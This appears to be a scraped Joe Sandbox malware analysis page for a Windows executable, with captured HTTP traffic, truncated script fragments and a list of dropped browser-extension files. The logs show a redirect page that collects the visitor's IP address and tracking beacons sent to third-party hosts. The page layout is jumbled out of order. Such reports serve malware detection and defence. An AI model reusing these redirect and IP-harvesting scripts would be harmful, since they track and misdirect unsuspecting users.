2023-03-21 12:20:50 UTC	30	IN	Data Raw: 38 31 66 0d 0a 21 66 75 6e 63 74 69 6f 6e 28 74 29 7b 69 66 28 21 74 2e 65 78 65 63 29 7b 74 2e 65 78 65 63 3d 21 30 3b 76 61 72 20 72 3d 21 21 6e 61 76 69 67 61 74 6f 72 2e 73 65 6e 64 42 65 61 63 6f 6e 2c 63 3d 6c 28 29 2c 61 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2e 72 65 70 6c 61 63 65 28 22 77 77 77 2e 22 2c 22 22 29 2c 65 3d 22 5f 64 74 73 70 76 22 2c 69 3d 22 68 74 74 70 73 3a 2f 2f 74 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 70 76 2f 22 2c 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 68 65 61 64 22 29 5b 30 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6f 7c 7c 76 6f 69 64 20 30 21 3d 3d 28 6f 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 Data Ascii: 81f!function(t){if(!t.exec){t.exec=!0;var r=!!navigator.sendBeacon,c=l(),a=window.location.hostname.replace("www.",""),e="_dtspv",i="https://t.dtscout.com/pv/",o=document.getElementsByTagName("head")[0];if(void 0!==o\|\|void 0!==(o=document.getElementsByT
2023-03-21 12:20:50 UTC	30	IN	Data Raw: 3b 72 65 74 75 72 6e 20 32 3d 3d 65 2e 6c 65 6e 67 74 68 3f 65 2e 70 6f 70 28 29 2e 73 70 6c 69 74 28 22 3b 22 29 2e 73 68 69 66 74 28 29 3a 6e 75 6c 6c 7d 2c 73 65 74 49 74 65 6d 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 29 7b 76 61 72 20 6e 3d 6e 65 77 20 44 61 74 65 3b 6e 2e 73 65 74 54 69 6d 65 28 6e 2e 67 65 74 54 69 6d 65 28 29 2b 32 35 39 32 65 36 29 2c 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 3d 74 2b 22 3d 22 2b 28 65 7c 7c 22 22 29 2b 22 3b 20 65 78 70 69 72 65 73 3d 22 2b 6e 2e 74 6f 55 54 43 53 74 72 69 6e 67 2b 22 3b 20 70 61 74 68 3d 2f 22 7d 7d 3b 76 61 72 20 73 3d 21 31 2c 64 3d 6d 28 29 3b 6e 75 6c 6c 3d 3d 64 26 26 28 73 3d 21 30 2c 64 3d 7b 73 73 3a 70 28 31 30 29 2c 73 74 3a 63 2c 73 6c 3a 63 2c 75 31 3a 63 2c 75 33 3a 63 2c 70 76 3a Data Ascii: ;return 2==e.length?e.pop().split(";").shift():null},setItem:function(t,e){var n=new Date;n.setTime(n.getTime()+2592e6),document.cookie=t+"="+(e\|\|"")+"; expires="+n.toUTCString+"; path=/"}};var s=!1,d=m();null==d&&(s=!0,d={ss:p(10),st:c,sl:c,u1:c,u3:c,pv:
2023-03-21 12:20:50 UTC	32	IN	Data Raw: 74 69 6f 6e 20 67 28 74 2c 65 29 7b 69 66 28 22 66 6f 72 6d 64 61 74 61 22 3d 3d 28 65 3d 65 7c 7c 22 73 74 72 69 6e 67 22 29 29 7b 76 61 72 20 6e 3d 6e 65 77 20 46 6f 72 6d 44 61 74 61 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 61 70 70 65 6e 64 28 22 5f 22 2b 6f 2c 74 5b 6f 5d 29 7d 65 6c 73 65 7b 6e 3d 5b 5d 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 74 29 6e 2e 70 75 73 68 28 22 5f 22 2b 6f 2b 22 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 74 5b 6f 5d 29 29 3b 6e 3d 6e 2e 6a 6f 69 6e 28 22 26 22 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 68 28 74 2c 65 29 7b 76 61 72 20 6e 3d 65 7c 7c 6d 28 29 3b 66 6f 72 28 76 61 72 20 6f 20 69 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 3d 7b 63 3a 7b 7d 7d 3a 22 63 22 69 6e 20 Data Ascii: tion g(t,e){if("formdata"==(e=e\|\|"string")){var n=new FormData;for(var o in t)n.append("_"+o,t[o])}else{n=[];for(var o in t)n.push("_"+o+"="+encodeURIComponent(t[o]));n=n.join("&")}return n}function h(t,e){var n=e\|\|m();for(var o in null==n?n={c:{}}:"c"in
2023-03-21 12:20:50 UTC	32	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:50 UTC	28	OUT	GET /r.php?payout=OPTIONAL&cnv_id=OPTIONAL HTTP/1.1 Host: offerszzzz.click Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:50 UTC	33	IN	HTTP/1.1 200 OK Server: nginx/1.22.0 Date: Tue, 21 Mar 2023 12:20:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Strict-Transport-Security: max-age=31536000
2023-03-21 12:20:50 UTC	33	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:50 UTC	32	OUT	GET /pv/?_a=v&_h=getfiles.wiki&_ss=44fghon7au&_pv=1&_ls=0&_u1=1&_u3=1&_cc=ch&_pl=d&_cbid=63lw&_cb=_dtspv.c HTTP/1.1 Host: t.dtscout.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: m=1; oa=1; df=1679401250
2023-03-21 12:20:50 UTC	33	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:20:50 GMT Content-Type: application/javascript Transfer-Encoding: chunked Connection: close X-T: 0.135 X-C: 0 Expires: Tue, 21 Mar 2023 12:20:49 GMT Cache-Control: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=bNk74WskJuudd8YiJZmOXmFUUgekcKEkZpcOYFvwEuJ8LSURmOMpANrigPHxb0swLwACkqTiopJR8UQo%2FQbVOgsQlCg7aOLKwJRIBDZMCwmXKhitzSpxqDOnxB9kOvI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab626b8ca039bb6-FRA
2023-03-21 12:20:50 UTC	34	IN	Data Raw: 33 32 0d 0a 74 72 79 7b 5f 64 74 73 70 76 2e 63 28 7b 22 62 22 3a 22 63 68 72 6f 6d 65 40 38 34 22 7d 2c 27 36 33 6c 77 27 29 3b 7d 63 61 74 63 68 28 65 29 7b 7d 0d 0a Data Ascii: 32try{_dtspv.c({"b":"chrome@84"},'63lw');}catch(e){}
2023-03-21 12:20:50 UTC	34	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report $RDGU87D.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\bg\background.js

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\content\content.js

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\img\logo\logo-128.png

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\img\logo\logo-16.png

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\img\logo\logo-48.png

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\img\logo\logo.svg

C:\Users\user\AppData\Local\Temp\17vsRA25JVNi\manifest.json

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\bg\background.js

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\content\content.js

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\img\logo\logo-128.png

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\img\logo\logo-16.png

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\img\logo\logo-48.png

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\img\logo\logo.svg

C:\Users\user\AppData\Local\Temp\1NktFyo3fU3D\manifest.json

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\bg\background.js

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\content\content.js

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\img\logo\logo-128.png

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\img\logo\logo-16.png

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\img\logo\logo-48.png

C:\Users\user\AppData\Local\Temp\7rq6ox04ddx8\img\logo\logo.svg

Windows Analysis Report
$RDGU87D.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:51 UTC	34	OUT	GET /favicon.ico HTTP/1.1 Host: getfiles.wiki Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: image/webp,image/apng,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: HstCfa4708787=1679430047893; HstCla4708787=1679430047893; HstCmu4708787=1679430047893; HstPn4708787=1; HstPt4708787=1; HstCnv4708787=1; HstCns4708787=1
2023-03-21 12:20:51 UTC	37	IN	HTTP/1.1 404 Not Found Date: Tue, 21 Mar 2023 12:20:51 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache vary: User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: BYPASS Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab626bade183826-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-21 12:20:51 UTC	37	IN	Data Raw: 34 64 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 Data Ascii: 4d6<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helveti
2023-03-21 12:20:51 UTC	38	IN	Data Raw: 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f Data Ascii: uld not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);bo
2023-03-21 12:20:51 UTC	39	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:51 UTC	39	OUT	OPTIONS /report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://getfiles.wiki Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:51 UTC	39	IN	HTTP/1.1 200 OK content-length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Tue, 21 Mar 2023 12:20:51 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:51 UTC	39	OUT	POST /report/v3?s=c8%2BCrm4NPt8S6LMv8LkUdKVGM1%2BdE8Prwy3CjAgKoWNEtN8TXYqpef2wgOOMPn7TKkUOyHWeJn3MNlMS7SZ6rVUAvqvRoTsTYnyjR4LbyjZapA8oYhK8KQrJoXYsjxwb HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 464 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:51 UTC	40	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 4d 54 41 79 4c 6a 45 79 4f 53 34 78 4e 44 4d 75 4e 7a 67 3d 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 37 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 Data Ascii: [{"age":1,"body":{"elapsed_time":326,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg=","sampling_fraction":1.0,"server_ip":"188.114.97.3","status_code":404,"type":"
2023-03-21 12:20:51 UTC	40	IN	HTTP/1.1 200 OK content-length: 0 date: Tue, 21 Mar 2023 12:20:51 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:21:35 UTC	41	OUT	GET /stats/e.php?4708787&@Ab&@R40431&@w HTTP/1.1 Host: s4.histats.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php?gjhagdjfbdjk=MTAyLjEyOS4xNDMuNzg= Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:21:35 UTC	41	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:21:35 GMT Content-Type: text/html;charset=UTF-8 Content-Length: 380 Connection: close
2023-03-21 12:21:35 UTC	41	IN	Data Raw: 5f 48 53 54 5f 63 6e 74 76 61 6c 3d 22 23 33 56 69 73 2e 20 74 6f 64 61 79 3d 31 31 30 36 22 3b 63 68 66 68 32 28 5f 48 53 54 5f 63 6e 74 76 61 6c 29 3b 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 62 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 62 2e 73 72 63 3d 22 2f 2f 65 2e 64 74 73 63 6f 75 74 2e 63 6f 6d 2f 65 2f 3f 76 3d 31 61 26 70 69 64 3d 35 32 30 30 26 73 69 74 65 3d 31 26 6c 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 2b 22 26 6a 3d 22 2b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 3b 0a 62 2e 61 73 79 6e 63 3d 22 61 73 Data Ascii: _HST_cntval="#3Vis. today=1106";chfh2(_HST_cntval);;!function(){try{var b=document.createElement("script");b.src="//e.dtscout.com/e/?v=1a&pid=5200&site=1&l="+encodeURIComponent(window.location.href)+"&j="+encodeURIComponent(document.referrer);b.async="as

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:43 UTC	1	OUT	POST /ListAccounts?gpsia=1&source=ChromiumBrowser&json=standard HTTP/1.1 Host: accounts.google.com Connection: keep-alive Content-Length: 1 Origin: https://www.google.com Content-Type: application/x-www-form-urlencoded Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=WP.289365
2023-03-21 12:20:43 UTC	1	OUT	Data Raw: 20 Data Ascii:
2023-03-21 12:20:43 UTC	3	IN	HTTP/1.1 200 OK Content-Type: application/json; charset=utf-8 Access-Control-Allow-Origin: https://www.google.com Access-Control-Allow-Credentials: true X-Content-Type-Options: nosniff Cache-Control: no-cache, no-store, max-age=0, must-revalidate Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Date: Tue, 21 Mar 2023 12:20:43 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Permissions-Policy: ch-ua-arch=, ch-ua-bitness=, ch-ua-full-version=, ch-ua-full-version-list=, ch-ua-model=, ch-ua-wow64=, ch-ua-platform=, ch-ua-platform-version= Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version Cross-Origin-Opener-Policy: same-origin; report-to="IdentityListAccountsHttp" Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/IdentityListAccountsHttp/cspreport Content-Security-Policy: script-src 'report-sample' 'nonce-9HTqeun2loieMPtrbJf89A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/IdentityListAccountsHttp/cspreport;worker-src 'self' Content-Security-Policy: script-src 'unsafe-inline' 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/IdentityListAccountsHttp/cspreport/allowlist Report-To: {"group":"IdentityListAccountsHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/IdentityListAccountsHttp/external"}]} Server: ESF X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2023-03-21 12:20:43 UTC	5	IN	Data Raw: 31 31 0d 0a 5b 22 67 61 69 61 2e 6c 2e 61 2e 72 22 2c 5b 5d 5d 0d 0a Data Ascii: 11["gaia.l.a.r",[]]
2023-03-21 12:20:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:43 UTC	5	OUT	GET /r.php?key=pvwarw3 HTTP/1.1 Host: exturl.com Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:44 UTC	6	IN	HTTP/1.1 302 Found Server: nginx/1.22.0 Date: Tue, 21 Mar 2023 12:20:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: uclick=17xs3vbz0; expires=Wed, 22-Mar-2023 12:20:44 GMT; Max-Age=86400; path=/; secure; SameSite=none Set-Cookie: uclickhash=17xs3vbz0-17xs3vbz0-bzfe-0-qdi4-hqbl-hqwj-1e3108; expires=Wed, 22-Mar-2023 12:20:44 GMT; Max-Age=86400; path=/; secure; SameSite=none Location: https://getfiles.wiki/redirect.php Strict-Transport-Security: max-age=31536000
2023-03-21 12:20:44 UTC	6	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:44 UTC	6	OUT	GET /redirect.php HTTP/1.1 Host: getfiles.wiki Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:44 UTC	7	IN	HTTP/1.1 200 OK Date: Tue, 21 Mar 2023 12:20:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close vary: Accept-Encoding,User-Agent x-turbo-charged-by: LiteSpeed CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=SXklpxtuHPOD4HZqq8DEaVK5llmnNBP8Du25yIJ2YksDUkUM0UUPYXWVEQNNMS9ZKqqbAtYrY4fcd6UNnOsg1r5Pd9H7OvDxm5JBBuDgP1dhtzwR587nEamV4XOwNvet"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7ab626906bd639d0-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-21 12:20:44 UTC	8	IN	Data Raw: 31 32 36 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 20 20 66 75 6e 63 74 69 6f 6e 20 67 65 74 49 50 28 6a 73 6f 6e 29 20 7b 0d 0a 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 67 65 74 66 69 6c 65 73 2e 77 69 6b 69 2f 72 65 64 69 72 65 63 74 2e 70 68 70 3f 67 6a 68 61 67 64 6a 66 62 64 6a 6b 3d 22 2b 62 74 6f 61 28 6a 73 6f 6e 2e 69 70 29 3b 0d 0a 20 20 20 20 65 78 69 74 28 29 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 69 70 69 66 79 2e Data Ascii: 126<script type="application/javascript"> function getIP(json) { window.location.href = "https://getfiles.wiki/redirect.php?gjhagdjfbdjk="+btoa(json.ip); exit(); }</script><script type="application/javascript" src="https://api.ipify.
2023-03-21 12:20:44 UTC	8	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	kBytes transferred	Direction	Data
2023-03-21 12:20:45 UTC	8	OUT	GET /?format=jsonp&callback=getIP HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Referer: https://getfiles.wiki/redirect.php Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2023-03-21 12:20:47 UTC	8	IN	HTTP/1.1 200 OK Content-Length: 31 Content-Type: application/javascript Date: Tue, 21 Mar 2023 12:20:47 GMT Vary: Origin Connection: close
2023-03-21 12:20:48 UTC	8	IN	Data Raw: 67 65 74 49 50 28 7b 22 69 70 22 3a 22 31 30 32 2e 31 32 39 2e 31 34 33 2e 37 38 22 7d 29 3b Data Ascii: getIP({"ip":"102.129.143.78"});

Timestamp	kBytes transferred	Direction	Data
